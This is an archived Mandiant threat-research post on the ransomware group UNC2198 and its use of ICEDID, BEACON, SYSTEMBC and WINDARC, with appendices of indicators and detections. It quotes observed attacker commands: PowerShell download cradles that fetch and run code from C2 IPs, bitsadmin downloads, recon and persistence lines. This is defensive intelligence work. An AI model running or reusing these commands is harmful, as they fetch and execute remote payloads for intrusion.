{ "id": "26489768-aaff-4a21-9439-a9e0ac508161", "created_at": "2026-04-06T00:16:55.669652Z", "updated_at": "2026-04-10T03:37:23.924959Z", "deleted_at": null, "sha1_hash": "025d817f8987c48eabd3548f89554f47abb5bbd9", "title": "So Unchill: Melting UNC2198 ICEDID to Ransomware Operations | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 629921, "plain_text": "So Unchill: Melting UNC2198 ICEDID to Ransomware Operations\r\n| Mandiant\r\nBy Mandiant\r\nPublished: 2021-02-25 · Archived: 2026-04-05 16:04:42 UTC\r\nWritten by: Bryce Abdo, Brendan McKeague, Van Ta\r\nMandiant Advanced Practices (AP) closely tracks the shifting tactics, techniques, and procedures (TTPs) of\r\nfinancially motivated groups who severely disrupt organizations with ransomware. In May 2020, FireEye released\r\na blog post detailing intrusion tradecraft associated with the deployment of MAZE. As of publishing this post, we\r\ntrack 11 distinct groups that have deployed MAZE ransomware. At the close of 2020, we noticed a shift in a\r\nsubset of these groups that have started to deploy EGREGOR ransomware in favor of MAZE ransomware\r\nfollowing access acquired from ICEDID infections.\r\nSince its discovery in 2017 as a banking trojan, ICEDID evolved into a pernicious point of entry for financially\r\nmotivated actors to conduct intrusion operations. In earlier years, ICEDID was deployed to primarily target\r\nbanking credentials. In 2020 we observed adversaries using ICEDID more explicitly as a tool to enable access to\r\nimpacted networks, and in many cases this was leading to the use of common post-exploitation frameworks and\r\nultimately the deployment of ransomware. This blog post shines a heat lamp on the latest tradecraft of UNC2198,\r\nwho used ICEDID infections to deploy MAZE or EGREGOR ransomware.\r\nBuilding an Igloo: ICEDID Infections\r\nSeparate phases of intrusions are attributed to different uncategorized (UNC) groups when discrete operations\r\nsuch as obtaining access are not part of a contiguous operation. Pure “access operations” establish remote access\r\ninto a target environment for follow on operations actioned by a separate group. A backdoor deployed to establish\r\nan initial foothold for another group is an example of an access operation.\r\nBetween July and December 2020, an ICEDID phishing infection chain consisted of a multi-stage process\r\ninvolving MOUSEISLAND and PHOTOLOADER (Figure 1).\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 1 of 20\n\nFigure 1: Example UNC2420 MOUSEISLAND to ICEDID Infection Chain\r\nMOUSEISLAND is a Microsoft Word macro downloader used as the first infection stage and is delivered inside a\r\npassword-protected zip attached to a phishing email (Figure 2). Based on our intrusion data from responding to\r\nICEDID related incidents, the secondary payload delivered by MOUSEISLAND has been PHOTOLOADER,\r\nwhich acts as an intermediary downloader to install ICEDID. Mandiant attributes the MOUSEISLAND\r\ndistribution of PHOTOLOADER and other payloads to UNC2420, a distribution threat cluster created by\r\nMandiant’s Threat Pursuit team. UNC2420 activity shares overlaps with the publicly reported nomenclature of\r\n“Shathak” or “TA551”.\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 2 of 20\n\nFigure 2: UNC2420 MOUSEISLAND Phishing Email\r\nIce, Ice, BEACON...UNC2198\r\nAlthough analysis is always ongoing, at the time of publishing this blog post, Mandiant tracks multiple distinct\r\nthreat clusters (UNC groups) of various sizes that have used ICEDID as a foothold to enable intrusion operations.\r\nThe most prominent of these threat clusters is UNC2198, a group that has targeted organizations in North America\r\nacross a breadth of industries. In at least five cases, UNC2198 acquired initial access from UNC2420\r\nMOUSEISLAND to conduct intrusion operations. In 2020, Mandiant attributed nine separate intrusions to\r\nUNC2198. UNC2198’s objective is to monetize their intrusions by compromising victim networks with\r\nransomware. In July 2020, Mandiant observed UNC2198 leverage network access provided by an ICEDID\r\ninfection to encrypt an environment with MAZE ransomware. As the year progressed into October and November,\r\nwe observed UNC2198 shift from deploying MAZE to using EGREGOR ransomware during another Incident\r\nResponse engagement. Like MAZE, EGREGOR is operated using an affiliate model, where affiliates who deploy\r\nEGREGOR are provided with proceeds following successful encryption and extortion for payment.\r\nThe UNC2198 cluster expanded over the course of more than six months. Mandiant’s December 2020 blog post\r\non UNCs described the analytical tradecraft we use to merge and graduate clusters of activity. Merging UNCs is a\r\nsubstantial analytical practice in which indicators and tradecraft attributed to one group are scrutinized against\r\nanother. Two former UNCs that shared similar modus operandi were eventually merged into UNC2198.\r\nThe Snowball Effect of Attribution\r\nAP created UNC2198 based on a single intrusion in June 2020 involving ICEDID, BEACON, SYSTEMBC and\r\nWINDARC. UNC2198 compromised 32 systems in 26 hours during this incident; however, ransomware was not\r\ndeployed. Throughout July 2020 we attributed three intrusions to UNC2198 from Incident Response engagements,\r\nincluding one resulting in the deployment of MAZE ransomware. In October 2020, a slew of activity at both\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 3 of 20\n\nIncident Response engagements and Managed Defense clients resulted in the creation of two new UNC groups,\r\nand another incident attributed to UNC2198.\r\nOne of the new UNC groups created in October 2020 was given the designation UNC2374. UNC2374 began as its\r\nown distinct cluster where BEACON, WINDARC, and SYSTEMBC were observed during an incident at a\r\nManaged Defense customer. Initial similarities in tooling did not constitute a strong enough link to merge\r\nUNC2374 with UNC2198 yet.\r\nTwo and a half months following the creation of UNC2374, we amassed enough data points to merge UNC2374\r\ninto UNC2198. Some of the data points used in merging UNC2374 into UNC2198 include:\r\nUNC2198 and UNC2374 Cobalt Strike Team Servers used self-signed certificates with the following\r\nsubject on TCP port 25055:\r\nC = US, ST = CA, L = California, O = Oracle Inc, OU = Virtual Services, CN = oracle.com\r\nUNC2198 and UNC2374 deployed WINDARC malware to identical file paths:\r\n%APPDATA%\\teamviewers\\msi.dll\r\nThe same code signing certificate used to sign an UNC2198 BEACON loader was used to sign two\r\nUNC2374 SYSTEMBC tunneler payloads.\r\nUNC2374 and UNC2198 BEACON C2 servers were accessed by the same victim system within a 10-\r\nminute time window during intrusion operations.\r\nThe other UNC group created in October 2020 was given the designation UNC2414. Three separate intrusions\r\nwere attributed to UNC2414, and as the cluster grew, we surfaced similarities between UNC2414 and UNC2198.\r\nA subset of the data points used to merge UNC2414 into UNC2198 include:\r\nUNC2198 and UNC2414 BEACON servers used self-signed certificates using the following subject on\r\nTCP port 25055:\r\nC = US, ST = CA, L = California, O = Oracle Inc, OU = Virtual Services, CN = oracle.com\r\nUNC2198 and UNC2414 installed BEACON as C:\\Windows\\int32.dll\r\nUNC2198 and UNC2414 installed the RCLONE utility as C:\\Perflogs\\rclone.exe\r\nUNC2198 and UNC2414 were proven to be financially motivated actors that had leveraged ICEDID as\r\ninitial access:\r\nUNC2198 had deployed MAZE\r\nUNC2414 had deployed EGREGOR\r\nThe merge between UNC2198 and UNC2414 was significant because it revealed UNC2198 has access to\r\nEGREGOR ransomware. The timing of the EGREGOR usage is also consistent with MAZE ransomware shutting\r\ndown as reported by Mandiant Intelligence. Figure 3 depicts the timeline of related intrusions and merges into\r\nUNC2198.\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 4 of 20\n\nFigure 3: UNC2198 timeline\r\nUNC2198 Intrusion Flow: After Initial Access\r\nExpanding the UNC2198 cluster through multiple intrusions and merges with other UNC groups highlights the\r\nrange of TTPs employed. We have pulled out some key data from all our UNC2198 intrusions to illustrate an\r\namalgamation of capabilities used by the threat actor.\r\nEstablish Foothold\r\nAfter obtaining access, UNC2198 has deployed additional malware using various techniques. For instance,\r\nUNC2198 used InnoSetup droppers to install a WINDARC backdoor on the target host. UNC2198 also used BITS\r\nJobs and remote PowerShell downloads to download additional tools like SYSTEMBC for proxy and tunneler\r\ncapabilities. Example commands for download and execution are:\r\n%COMSPEC% /C echo bitsadmin /transfer 257e http://\u003cREDACTED\u003e/\u003cREDACTED\u003e.exe %APPDATA%\r\n\u003cREDACTED\u003e.exe \u0026 %APPDATA%\u003cREDACTED\u003e.exe \u0026 del %APPDATA% \u003cREDACTED\u003e.exe ^\u003e\r\n%SYSTEMDRIVE%\\WINDOWS\\Temp\\FmpaXUHFennWxPIM.txt \u003e\r\n\\WINDOWS\\Temp\\MwUgqKjEDjCMDGmC.bat \u0026 %COMSPEC%\r\n/C start %COMSPEC% /C \\WINDOWS\\Temp\\MwUgqKjEDjCMDGmC.bat\r\n%COMSPEC% /C echo powershell.exe -nop -w hidden -c (new-object\r\nSystem.Net.WebClient).Downloadfile(http://\u003cREDACTED\u003e/\u003cREDACTED\u003e.exe,\r\n\u003cREDACTED\u003e.exe) ^\u003e %SYSTEMDRIVE%\\WINDOWS\\Temp\\AVaNbBXzKyxktAZI.txt \u003e \\WINDOWS\\Temp\\yoKjaqTIzJhdDLjD.bat \u0026\r\n%COMSPEC% /C start %COMSPEC% /C \\WINDOWS\\Temp\\yoKjaqTIzJhdDLjD.bat\r\nUNC2198 has used Cobalt Strike BEACON, Metasploit METERPRETER, KOADIC, and PowerShell EMPIRE\r\noffensive security tools during this phase as well.\r\nOffensive Security Tooling\r\nUNC2198 has used offensive security tools similarly seen across many threat actors. UNC2198 has used\r\nBEACON in roughly 90% of their intrusions. UNC2198 installs and executes Cobalt Strike BEACON in a variety\r\nof ways, including shellcode loaders using PowerShell scripts, service executables, and DLLs. While the ways and\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 5 of 20\n\nmeans of using BEACON are not inherently unique, there are still aspects to extrapolate that shed light on\r\nUNC2198 TTPs.\r\nFocusing in on specific BEACON executables tells a different story beyond the use of the tool itself. Aside from\r\njunk code and API calls, UNC2198 BEACON and METERPRETER executables often exhibit unique\r\ncharacteristics of malware packaging, including odd command-line arguments visible within strings and upon\r\nexecution via child processes:\r\ncmd.exe /c echo TjsfoRdwOe=9931 \u0026 reg add HKCU\\SOFTWARE\\WIlumYjNSyHob /v xFCbJrNfgBNqRy /t REG_DWORD /d 3045 \u0026\r\ncmd.exe /c echo ucQhymDRSRvq=1236 \u0026 reg add HKCU\\\\SOFTWARE\\\\YkUJvbgwtylk /v KYIaIoYxqwO /t REG_DWORD /d 9633 \u0026 e\r\ncmd.exe /c set XlOLqhCejHbSNW=8300 \u0026 reg add HKCU\\SOFTWARE\\WaMgGneKhtgTTy /v LbmWADsevLywrkP /t REG_DWORD /d 380\r\nThese example commands are non-functional, as they do not modify or alter payload execution.\r\nAnother technique involves installing BEACON using a file path containing mixed Unicode-escaped and ASCII\r\ncharacters to evade detection:\r\nUnicode Escaped C:\\ProgramData\\S\\u0443sH\\u0435\\u0430ls\\T\\u0430s\\u0441host.exe\r\nUnicode Unescaped C:\\ProgramData\\SуsHеаls\\Tаsсhost.exe\r\nThe executable was then executed by using a Scheduled Task named shadowdev:\r\ncmd.exe /c schtasks /create /sc minute /mo 1 /tn shadowdev /tr C:\\\\ProgramData\\\\S\\u0443sH\\u0435\\u0430ls\\\\T\\u043\r\nWhile the previous examples are related to compiled executables, UNC2198 has also used simple PowerShell\r\ndownload cradles to execute Base64-encoded and compressed BEACON stagers in memory:\r\npowershell -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('hxxp://5.149.253[.]199:80/auth'))\r\npowershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(\"hxxp://185.106.122[.]167:80/a\")\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('hxxp://195.123.233[.]157:80/ca\r\nDiscovery and Reconnaissance\r\nUNC2198 has exhibited common TTPs seen across many threat groups during discovery and reconnaissance\r\nactivities. UNC2198 has used the BloodHound active directory mapping utility during intrusions from within the\r\n“C:\\ProgramData” and “C:\\Temp” directories.\r\nThe following are collective examples of various commands executed by UNC2198 over time to enumerate a\r\ncompromised environment:\r\narp -a\r\nwhoami /groups\r\nwhoami.exe /groups /fo csv\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 6 of 20\n\nwhoami /all\r\nnet user \u003cRedacted\u003e\r\nnet groups \"Domain Admins\" /domain\r\nnet group \"Enterprise admins\" /domain\r\nnet group \"local admins\" /domain\r\nnet localgroup \"administrators\" /domain\r\nnltest /domain_trusts\r\nnltest /dclist:\u003cRedacted\u003e\r\nLateral Movement and Privilege Escalation\r\nUNC2198 has used Windows Remote Management and RDP to move laterally between systems. UNC2198 has\r\nalso performed remote execution of BEACON service binaries on targeted systems to move laterally. UNC2198\r\nlaunches SMB BEACON using PowerShell, executing command lines such as the following:\r\nC:\\WINDOWS\\system32\\cmd.exe /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPA\r\nbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AH\r\nMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwA3ADIALw...\u003cTruncated\u003e\r\nDuring one intrusion, UNC2198 used the SOURBITS privilege escalation utility to execute files on a target\r\nsystem. SOURBITS is a packaged exploit utility for CVE-2020-0787, which is a vulnerability that was disclosed\r\nin 2020 for Windows Background Intelligent Transfer Service (BITS). SOURBITS consists of code derived from a\r\nGitHub Repository that is implemented as a command-line utility, which can execute arbitrary files with elevated\r\nprivileges. UNC2198 used SOURBITS with the following components:\r\nC:\\Users\\\u003cUser\u003e\\Downloads\\runsysO.cr\r\nC:\\Users\\\u003cUser\u003e\\Downloads\\starterO.exe\r\nThe file runsysO.cr is an XOR-encoded PE executable that exploits CVE-2020-0787, and based on the target\r\nsystem's bitness, it will drop one of two embedded SOURBITS payloads.\r\nData Theft, Ransomware Deployment and #TTR\r\nLike other financially motivated threat actors, part of UNC2198’s modus operandi in latter stages of intrusions\r\ninvolves the exfiltration of hundreds of gigabytes of the victim organizations’ data before ransomware is installed.\r\nSpecifically, UNC2198 has used RCLONE, a command line utility used to synchronize cloud storage, to aid in the\r\nexfiltration of sensitive data. In all observed cases of data theft, RCLONE was used by UNC2198 from the\r\n“C:\\PerfLogs\\rclone.exe” file path.\r\n“Time-to-Ransom\" (TTR) is the delta between first-attributed access time and the time of ransomware\r\ndeployment. TTR serves as a useful gauge of how quickly an organization needs to respond to stave off a threat\r\nactor’s successful deployment of ransomware. TTR is not a perfect quantification, as external factors such as an\r\norganization’s security posture can drastically affect the measurement.\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 7 of 20\n\nIn this post, the TTR of UNC2198 is measured between ICEDID activity to the deployment of ransomware. In\r\nJuly 2020, UNC2198 deployed MAZE ransomware using PSEXEC, and the TTR was 5.5 days. In October 2020,\r\nUNC2198 deployed EGREGOR ransomware using forced GPO updates, and the TTR was 1.5 days.\r\nLooking Forward\r\nThreat actors leveraging access obtained through mass malware campaigns to deploy ransomware is a growing\r\ntrend. The efficiency of ransomware groups places a significant burden on defenders to rapidly respond before\r\nransomware deployment. As ransomware groups continue to gain operational expertise through successful\r\ncompromises, they will continue to shorten their TTR while scaling their operations. Understanding the TTPs\r\nfundamental to a specific operation like UNC2198 provides an edge to defenders in their response efforts. Our\r\nunparalleled understanding of groups like UNC2198 is translated into Mandiant Advantage. Accessing our\r\nholdings in Mandiant Advantage aids defenders in recognizing TTPs used by threat actors, assessing\r\norganizational risk, and taking action. Initial investments made into rapidly assessing a group’s modus operandi\r\npays dividends when they inevitably evolve and swap out components of their toolset. Whether it be MAZE or\r\nEGREGOR, something icy or hot, Advanced Practices will continue to pursue these unchill threat actors.\r\nAcknowledgements\r\nThank you to Dan Perez, Andrew Thompson, Nick Richard, Cian Lynch and Jeremy Kennelly for technical review\r\nof this content. In addition, thank you to Mandiant frontline responders for harvesting the valuable intrusion data\r\nthat enables our research.\r\nAppendix: Malware Families\r\nPHOTOLOADER is a downloader that has been observed to download ICEDID. It makes an HTTP request for a\r\nfake image file, which is RC4 decrypted to provide the final payload. Host information is sent to the command\r\nand control (C2) via HTTP cookies. Samples have been observed to contain an embedded C2 configuration that\r\ncontain the real C2 with a number of non-malicious domains. The non-malicious domains are contacted in\r\naddition to the real C2.\r\nWINDARC is a backdoor that hijacks the execution of TeamViewer to perform C2 communication. It supports\r\nplugins and accepts several backdoor commands. The commands include interacting with the TeamViewer tool,\r\nstarting a reverse shell, loading new plugins, downloading and executing files, and modifying configuration\r\nsettings.\r\nSYSTEMBC is a proxy malware that beacons to its C2 and opens new proxy connections between the C2 and\r\nremote hosts as indicated by the C2. Proxied communications are encrypted with RC4. The malware receives\r\ncommands via HTTP and creates new proxy connections as directed. Underground sales advertisements refer to\r\nthe software as a “socks5 backconnect system”. The malware is typically used to hide the malicious traffic\r\nassociated with other malware.\r\nAppendix: Detecting the Techniques\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 8 of 20\n\nFireEye security solutions detect these threats across email, endpoint, and network levels. The following is a\r\nsnapshot of existing detections related to activity outlined in this blog post.\r\nPlatform Detection Name\r\nFireEye Network Security\r\nDownloader.Macro.MOUSEISLAND\r\nDownloader.Win.PHOTOLOADER\r\nTrojan.PHOTOLOADER\r\nDownloader.IcedID\r\nTrojan.IcedID\r\nMalicious.SSL.IcedID\r\nMalicious.SSL.IcedIdCert\r\nTrojan.Malicious.Certificate\r\nBackdoor.BEACON\r\nTrojan.Generic\r\nTrojan.CobaltStrike\r\nFireEye Endpoint Security\r\nReal-Time (IOC)\r\nBLOODHOUND ATTACK PATH MAPPING (UTILITY)\r\nBLOODHOUND ATTACK PATH MAPPING A (UTILITY)\r\nCOBALT STRIKE (BACKDOOR)\r\nCOBALT STRIKE DEFAULT DLL EXPORT (BACKDOOR)\r\nCOBALT STRIKE NAMED PIPE ECHO (BACKDOOR)\r\nEGREGOR RANSOMWARE (FAMILY)\r\nICEDID (FAMILY)\r\nMAZE RANSOMWARE (FAMILY)\r\nMAZE RANSOMWARE A (FAMILY)\r\nMETASPLOIT SERVICE ABUSE (UTILITY)\r\nMOUSEISLAND (DOWNLOADER)\r\nMOUSEISLAND A (DOWNLOADER)\r\nMOUSEISLAND B (DOWNLOADER)\r\nPOWERSHELL DOWNLOADER (METHODOLOGY)\r\nPOWERSHELL DOWNLOADER D (METHODOLOGY)\r\nSCHTASK CREATION FROM PROGRAMDATA (COLLECTION)\r\nSUSPICIOUS BITSADMIN USAGE A (METHODOLOGY)\r\nSUSPICIOUS POWERSHELL USAGE (METHODOLOGY)\r\nWMIC SHADOWCOPY DELETE (METHODOLOGY)\r\nMalware Protection (AV/MG)\r\nSYSTEMBC\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 9 of 20\n\nTrojan.EmotetU.Gen.*\r\nTrojan.Mint.Zamg.O\r\nGeneric.mg.*\r\nICEID\r\nGen:Variant.Razy.*\r\nGeneric.mg.*\r\nBEACON\r\nGen:Trojan.Heur.TP.TGW@bug909di\r\nGen:Variant.Bulz.1217\r\nTrojan.GenericKD.34797730\r\nGeneric.mg.*\r\nAppendix: Indicators\r\n95b78f4d3602aeea4f7a33c9f1b49a97 SYSTEMBC\r\n0378897e4ec1d1ee4637cff110635141 SYSTEMBC\r\nc803200ad4b9f91659e58f0617f0dafa SYSTEMBC\r\nad4d445091a3b66af765a1d653fd1eb7 SYSTEMBC\r\n9ecf25b1e9be0b20822fe25269fa5d02 SYSTEMBC\r\ne319f5a8fe496c0c8247e27c3469b20d SYSTEMBC\r\na8a7059278d82ce55949168fcd1ddde4 SYSTEMBC\r\naea530f8a0645419ce0abe1bf2dc1584 SYSTEMBC\r\n3098fbc98e90d91805717d7a4f946c27 SYSTEMBC\r\n45.141.84.212:4132 SYSTEMBC\r\n45.141.84.223:4132 SYSTEMBC\r\n79.141.166.158:4124 SYSTEMBC\r\n149.28.201.253:4114 SYSTEMBC\r\n193.34.167.34:80 BEACON\r\n195.123.240.219:80 BEACON\r\n23.227.193.167:80 BEACON\r\n5.149.253.199:80 BEACON\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 10 of 20\n\ne124cd26fcce258addc85d7f010655ea BEACON\r\n7ae990c12bf5228b6d1b90d40ad0a79f BEACON\r\n3eb552ede658ee77ee4631d35eac6b43 BEACON\r\nc188c6145202b65a941c41e7ff2c9afd BEACON\r\n2f43055df845742d137a18b347f335a5 BEACON\r\n87dc37e0edb39c077c4d4d8f1451402c ICEDID\r\n1efababd1d6bd869f005f92799113f42 ICEDID\r\na64e7dd557e7eab3513c9a5f31003e68 ICEDID\r\n9760913fb7948f2983831d71a533a650 ICEDID\r\n14467102f8aa0a0d95d0f3c0ce5f0b59 ICEDID\r\ncolombosuede.club ICEDID\r\ncolosssueded.top  \r\ngolddisco.top ICEDID\r\njune85.cyou ICEDID\r\nAppendix: Mandiant Security Validation Actions\r\nOrganizations can validate their security controls against more than 60 actions with Mandiant Security Validation.\r\nVID Name\r\nA101-\r\n509\r\nPhishing Email - Malicious Attachment, MOUSEISLAND, Macro Based Downloader\r\nA150-\r\n326\r\nMalicious File Transfer - MOUSEISLAND, Download, Variant #1\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 11 of 20\n\nA150-\r\n433\r\nMalicious File Transfer - MOUSEISLAND, Download, Variant #2\r\nA101-\r\n282\r\nMalicious File Transfer - MOUSEISLAND Downloader, Download\r\nA104-\r\n632\r\nProtected Theater - MOUSEISLAND Downloader, Execution\r\nA101-\r\n266\r\nCommand and Control - MOUSEISLAND, HTTP GET Request for PHOTOLOADER\r\nA101-\r\n280\r\nMalicious File Transfer - PHOTOLOADER, Download\r\nA101-\r\n263\r\nCommand and Control - PHOTOLOADER, DNS Query #1\r\nA101-\r\n281\r\nMalicious File Transfer - ICEDID Stage 3, Download\r\nA101-\r\n279\r\nMalicious File Transfer - ICEDID Final Payload, Download\r\nA101-\r\n265\r\nCommand and Control - ICEDID, DNS Query #1\r\nA101-\r\n264\r\nCommand and Control - ICEDID, DNS Query #2\r\nA101-\r\n037\r\nMalicious File Transfer - MAZE, Download, Variant #1\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 12 of 20\n\nA101-\r\n038\r\nMalicious File Transfer - MAZE, Download, Variant #2\r\nA101-\r\n039\r\nMalicious File Transfer - MAZE, Download, Variant #3\r\nA101-\r\n040\r\nMalicious File Transfer - MAZE, Download, Variant #4\r\nA101-\r\n041\r\nMalicious File Transfer - MAZE, Download, Variant #5\r\nA101-\r\n042\r\nMalicious File Transfer - MAZE, Download, Variant #6\r\nA101-\r\n043\r\nMalicious File Transfer - MAZE, Download, Variant #7\r\nA101-\r\n044\r\nMalicious File Transfer - MAZE, Download, Variant #8\r\nA101-\r\n045\r\nMalicious File Transfer - MAZE, Download, Variant #9\r\nA100-\r\n878\r\nCommand and Control - MAZE Ransomware, C2 Check-in\r\nA101-\r\n030\r\nCommand and Control - MAZE Ransomware, C2 Beacon, Variant #1\r\nA101-\r\n031\r\nCommand and Control - MAZE Ransomware, C2 Beacon, Variant #2\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 13 of 20\n\nA101-\r\n032\r\nCommand and Control - MAZE Ransomware, C2 Beacon, Variant #3\r\nA104-\r\n734\r\nProtected Theater - MAZE, PsExec Execution\r\nA104-\r\n487\r\nProtected Theater - MAZE Ransomware, Encoded PowerShell Execution\r\nA104-\r\n485\r\nProtected Theater - MAZE Ransomware Execution, Variant #1\r\nA104-\r\n486\r\nProtected Theater - MAZE Ransomware Execution, Variant #2\r\nA104-\r\n491\r\nHost CLI - MAZE, Create Target.lnk\r\nA104-\r\n494\r\nHost CLI - MAZE, Dropping Ransomware Note Burn Directory\r\nA104-\r\n495\r\nHost CLI - MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.html Variant\r\nA104-\r\n496\r\nHost CLI - MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.txt Variant\r\nA104-\r\n498\r\nHost CLI - MAZE, Desktop Wallpaper Ransomware Message\r\nA150-\r\n668\r\nMalicious File Transfer - EGREGOR, Download\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 14 of 20\n\nA101-\r\n460\r\nCommand and Control - EGREGOR, GET DLL Payload\r\nA150-\r\n675\r\nProtected Theater - EGREGOR, Execution, Variant #1\r\nA101-\r\n271\r\nMalicious File Transfer - BEACON, Download, Variant #1\r\nA150-\r\n610\r\nMalicious File Transfer - BEACON, Download\r\nA150-\r\n609\r\nCommand and Control - BEACON, Check-in\r\nA104-\r\n732\r\nProtected Theater - BEACON, Mixed Unicode-Escaped and ASCII Characters Execution\r\nA101-\r\n514\r\nMalicious File Transfer - WINDARC, Download, Variant #1\r\nA100-\r\n072\r\nMalicious File Transfer - SYSTEMBC Proxy, Download\r\nA100-\r\n886\r\nMalicious File Transfer - Rclone.exe, Download\r\nA100-\r\n880\r\nMalicious File Transfer - Bloodhound Ingestor C Sharp Executable Variant, Download\r\nA100-\r\n881\r\nMalicious File Transfer - Bloodhound Ingestor C Sharp PowerShell Variant, Download\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 15 of 20\n\nA100-\r\n882\r\nMalicious File Transfer - Bloodhound Ingestor PowerShell Variant, Download\r\nA100-\r\n877\r\nActive Directory - BloodHound, CollectionMethod All\r\nA101-\r\n513\r\nMalicious File Transfer - SOURBITS, Download, Variant #1\r\nA104-\r\n733\r\nProtected Theater - CVE-2020-0787, Arbitrary File Move\r\nA100-\r\n353\r\nCommand and Control - KOADIC Agent (mshta)\r\nA100-\r\n355\r\nCommand and Control - Multiband Communication using KOADIC\r\nA104-\r\n088\r\nHost CLI - Timestomp W/ PowerShell\r\nA104-\r\n277\r\nHost CLI - EICAR COM File Download via PowerShell\r\nA104-\r\n281\r\nHost CLI - EICAR TXT File Download via PowerShell\r\nA104-\r\n664\r\nHost CLI - EICAR, Download with PowerShell\r\nA150-\r\n054\r\nMalicious File Transfer - EMPIRE, Download\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 16 of 20\n\nA100-\r\n327\r\nCommand and Control - PowerShell Empire Agent (http)\r\nA100-\r\n328\r\nLateral Movement, Execution - PsExec\r\nA100-\r\n498\r\nScanning Activity - TCP Port Scan for Open RDP\r\nA100-\r\n502\r\nScanning Activity - UDP Port Scan for Open RDP\r\nA100-\r\n316\r\nLateral Movement - PSSession and WinRM\r\nA104-\r\n081\r\nHost CLI - Mshta\r\nAppendix: UNC2198 MITRE ATT\u0026CK Mapping\r\nATT\u0026CK Tactic Category Techniques\r\nResource Development\r\nAcquire Infrastructure (T1583)\r\nVirtual Private Server (T1583.003)\r\nDevelop Capabilities (T1587)\r\nDigital Certificates (T1587.003)\r\nObtain Capabilities (T1588)\r\nCode Signing Certificates (T1588.003)\r\nDigital Certificates (T1588.004)\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 17 of 20\n\nInitial Access\r\nPhishing (T1566)\r\nSpearphishing Attachment (T1566.001)\r\nExternal Remote Services (T1133)\r\nValid Accounts (T1078)\r\nExecution\r\nCommand and Scripting Interpreter (T1059)\r\nPowerShell (T1059.001)\r\nVisual Basic (T1059.005)\r\nWindows Command Shell (T1059.003)\r\nScheduled Task/Job (T1053)\r\nScheduled Task (T1053.005)\r\nSystem Services (T1569)\r\nService Execution (T1569.002)\r\nUser Execution (T1204)\r\nMalicious File (T1204.002)\r\nWindows Management Instrumentation (T1047)\r\nPersistence\r\nExternal Remote Services (T1133)\r\nScheduled Task/Job (T1053)\r\nScheduled Task (T1053.005)\r\nValid Accounts (T1078)\r\nPrivilege Escalation\r\nProcess Injection (T1055)\r\nScheduled Task/Job (T1053)\r\nScheduled Task (T1053.005)\r\nValid Accounts (T1078)\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 18 of 20\n\nDefense Evasion\r\nImpair Defenses (T1562)\r\nDisable or Modify System Firewall (T1562.004)\r\nDisable or Modify Tools (T1562.001)\r\nIndicator Removal on Host (T1070)\r\nTimestomp (T1070.006)\r\nIndirect Command Execution (T1202)\r\nModify Registry (T1112)\r\nObfuscated Files or Information (T1027)\r\nSteganography (T1027.003)\r\nProcess Injection (T1055)\r\nSigned Binary Proxy Execution (T1218)\r\nMshta (T1218.005)\r\nSubvert Trust Controls (T1553)\r\nCode Signing (T1553.002)\r\nValid Accounts (T1078)\r\nVirtualization/Sandbox Evasion (T1497)\r\nCredential Access OS Credential Dumping (T1003)\r\nDiscovery Account Discovery (T1087)\r\nLocal Account (T1087.001)\r\nDomain Trust Discovery (T1482)\r\nFile and Directory Discovery (T1083)\r\nPermission Groups Discovery (T1069)\r\nSystem Information Discovery (T1082)\r\nSystem Network Configuration Discovery (T1016)\r\nSystem Owner/User Discovery (T1033)\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html\r\nPage 19 of 20\n\nVirtualization/Sandbox Evasion (T1497)\r\nLateral Movement\r\nRemote Services (T1021)\r\nRemote Desktop Protocol (T1021.001)\r\nSMB/Windows Admin Shares (T1021.002)\r\nSSH (T1021.004)\r\nCollection\r\nArchive Collected Data (T1560)\r\nArchive via Utility (T1560.001)\r\nCommand and Control\r\nApplication Layer Protocol (T1071)\r\nWeb Protocols (T1071.001)\r\nEncrypted Channel 